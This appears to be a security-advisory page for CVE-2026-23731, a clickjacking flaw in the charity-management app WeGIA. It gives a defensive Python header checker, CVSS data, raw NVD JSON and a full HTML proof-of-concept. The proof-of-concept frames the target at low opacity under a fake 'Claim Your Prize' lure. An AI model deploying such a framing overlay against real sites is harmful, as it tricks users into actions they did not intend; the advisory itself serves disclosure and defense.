Security Vulnerability Report
CVE-2026-23731 CVSS 4.3 MEDIUM

CVE-2026-23731

Published: 2026-01-16 20:15:51
Last Modified: 2026-01-30 18:30:33

Description

WeGIA is a web manager for charitable institutions. Prior to 3.6.2, the web application is vulnerable to clickjacking attacks. The WeGIA application does not send any defensive HTTP headers related to framing protection. In particular, X-Frame-Options is missing and Content-Security-Policy with the frame-ancestors directive is not configured. Because of this, an attacker can load any WeGIA page inside a malicious HTML document, overlay deceptive elements, hide real buttons, or force accidental interaction with sensitive workflows. This vulnerability is fixed in 3.6.2.
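The description names the two header-based defenses whose absence makes the page frameable. The following Python function, an added defender-side example that is not part of this advisory or of the WeGIA project, encodes that check: given the response headers of a page, it reports whether framing is restricted by a valid X-Frame-Options value or by a Content-Security-Policy frame-ancestors directive, and lists what is missing or weak. It goes slightly beyond the description by also flagging the obsolete ALLOW-FROM form and a wildcard frame-ancestors, both of which leave a page frameable in current browsers. The header samples at the bottom are constructed for illustration; they are not captured WeGIA responses.

```python
"""Check HTTP response headers for clickjacking (framing) protection.

Added example; the sample headers below are constructed, not captured from WeGIA.
"""
from typing import Mapping


def parse_csp(value: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy header into {directive: [sources]}.

    Directives are separated by ';'; directive names are ASCII case-insensitive.
    """
    policy: dict[str, list[str]] = {}
    for part in value.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name, sources = tokens[0].lower(), tokens[1:]
        policy.setdefault(name, []).extend(sources)
    return policy


def framing_protection(headers: Mapping[str, str]) -> dict:
    """Return a verdict on framing protection for one HTTP response.

    Result keys:
      protected  - True if at least one mechanism restricts framing
      mechanisms - the mechanisms that apply
      findings   - notes on missing or weak headers (empty when fully protected)
    """
    # HTTP header names are case-insensitive; normalise once.
    lower = {k.lower(): v for k, v in headers.items()}
    mechanisms: list[str] = []
    findings: list[str] = []

    xfo = lower.get("x-frame-options")
    if xfo is None:
        findings.append("X-Frame-Options missing")
    else:
        token = xfo.strip().upper()
        if token in ("DENY", "SAMEORIGIN"):
            mechanisms.append(f"X-Frame-Options: {token}")
        elif token.startswith("ALLOW-FROM"):
            # ALLOW-FROM is obsolete and ignored by current browsers, so it
            # provides no protection; frame-ancestors is the replacement.
            findings.append("X-Frame-Options uses obsolete ALLOW-FROM")
        else:
            findings.append(f"X-Frame-Options has invalid value {xfo!r}")

    csp = lower.get("content-security-policy")
    if csp is None:
        findings.append("Content-Security-Policy missing")
    else:
        sources = parse_csp(csp).get("frame-ancestors")
        if sources is None:
            findings.append("Content-Security-Policy has no frame-ancestors directive")
        elif "*" in sources:
            findings.append("frame-ancestors allows any origin (*)")
        else:
            mechanisms.append("frame-ancestors " + " ".join(sources))

    return {"protected": bool(mechanisms), "mechanisms": mechanisms, "findings": findings}


# Constructed samples (hypothetical, not real WeGIA responses).
# The first matches the state the advisory describes: no framing headers at all.
VULNERABLE_SAMPLE = {"Content-Type": "text/html; charset=UTF-8", "Server": "Apache"}
# The second shows both defenses configured.
HARDENED_SAMPLE = {
    "Content-Type": "text/html; charset=UTF-8",
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'",
}

if __name__ == "__main__":
    for label, sample in (("vulnerable", VULNERABLE_SAMPLE), ("hardened", HARDENED_SAMPLE)):
        print(label, framing_protection(sample))
```

Note that a Content-Security-Policy-Report-Only header is deliberately not consulted: it only reports violations and does not block framing, so it must not count as protection.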

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE
WeGIA < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-23731 Clickjacking PoC -->
<!-- This PoC demonstrates how an attacker can embed WeGIA in an iframe -->
<!-- and overlay deceptive elements to perform clickjacking attacks -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>WeGIA Clickjacking PoC - CVE-2026-23731</title>
  <style>
    body {
      margin: 0;
      padding: 20px;
      font-family: Arial, sans-serif;
      background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
      min-height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .container {
      text-align: center;
      background: white;
      padding: 40px;
      border-radius: 15px;
      box-shadow: 0 10px 40px rgba(0,0,0,0.3);
    }
    h1 { color: #333; margin-bottom: 20px; }
    .poc-description { color: #666; margin-bottom: 30px; line-height: 1.6; }
    .clickjack-container {
      position: relative;
      width: 100%;
      max-width: 600px;
      height: 400px;
      margin: 0 auto;
      border: 3px solid #667eea;
      border-radius: 10px;
      overflow: hidden;
    }
    /* The vulnerable WeGIA page embedded in iframe */
    .target-iframe {
      width: 100%;
      height: 100%;
      opacity: 0.15;
      position: absolute;
      top: 0;
      left: 0;
      z-index: 1;
    }
    /* Malicious overlay button */
    .malicious-overlay {
      position: absolute;
      z-index: 2;
      background: linear-gradient(45deg, #ff6b6b, #ee5a24);
      color: white;
      border: none;
      padding: 15px 30px;
      font-size: 18px;
      font-weight: bold;
      cursor: pointer;
      border-radius: 25px;
      box-shadow: 0 4px 15px rgba(0,0,0,0.3);
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
    }
    .malicious-overlay:hover {
      background: linear-gradient(45deg, #ee5a24, #ff6b6b);
      box-shadow: 0 6px 20px rgba(0,0,0,0.4);
    }
    .fake-content {
      position: absolute;
      top: 10px;
      left: 10px;
      right: 10px;
      background: rgba(255,255,255,0.95);
      padding: 10px;
      border-radius: 5px;
      z-index: 3;
      font-size: 12px;
      color: #333;
    }
    .warning {
      background: #fff3cd;
      border: 1px solid #ffc107;
      color: #856404;
      padding: 15px;
      border-radius: 5px;
      margin-top: 20px;
      font-size: 14px;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Clickjacking PoC - CVE-2026-23731</h1>
    <p class="poc-description">
      This PoC demonstrates the clickjacking vulnerability in WeGIA < 3.6.2.<br>
      The page below embeds the vulnerable WeGIA application in an iframe.<br>
      The red button appears to be a harmless button, but it actually<br>
      overlays a sensitive action button in the WeGIA application.
    </p>
    <div class="clickjack-container">
      <!-- Vulnerable WeGIA page embedded in iframe -->
      <iframe class="target-iframe" src="http://target-website.com/WeGIA" scrolling="no" frameborder="0">
      </iframe>
      <!-- Fake content to deceive users -->
      <div class="fake-content">
        <strong>🎁 Special Offer!</strong><br>
        Click the button below to claim your prize!
      </div>
      <!-- Malicious overlay button -->
      <button class="malicious-overlay" onclick="alert('Clickjacking attack triggered!\nIn real attack, this would submit a sensitive form or perform an unintended action.')">
        Claim Your Prize →
      </button>
    </div>
    <div class="warning">
      ⚠️ <strong>Educational Purpose Only:</strong> This PoC is for security research and vulnerability assessment.
    </div>
  </div>
</body>
</html>

References

https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 (Issue Tracking, Patch)
https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 (Release Notes)
https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-99qp-hjvh-c59q (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23731", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:51.327", "lastModified": "2026-01-30T18:30:32.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. Prior to 3.6.2, The web application is vulnerable to clickjacking attacks. The WeGIA application does not send any defensive HTTP headers related to framing protection. In particular, X-Frame-Options is missing andContent-Security-Policy with frame-ancestors directive is not configured. Because of this, an attacker can load any WeGIA page inside a malicious HTML document, overlay deceptive elements, hide real buttons, or force accidental interaction with sensitive workflows. This vulnerability is fixed in 3.6.2."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. Anterior a 3.6.2, la aplicación web es vulnerable a ataques de clickjacking. La aplicación WeGIA no envía ningún encabezado HTTP defensivo relacionado con la protección contra el encuadre. En particular, falta X-Frame-Options y Content-Security-Policy con la directiva frame-ancestors no está configurado. Debido a esto, un atacante puede cargar cualquier página de WeGIA dentro de un documento HTML malicioso, superponer elementos engañosos, ocultar botones reales o forzar la interacción accidental con flujos de trabajo sensibles. 
Esta vulnerabilidad está corregida en 3.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "419B3A85-5754-4198-A73E-92A9DA8E7A68"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/pull/1333", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-99qp-hjvh-c59q", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}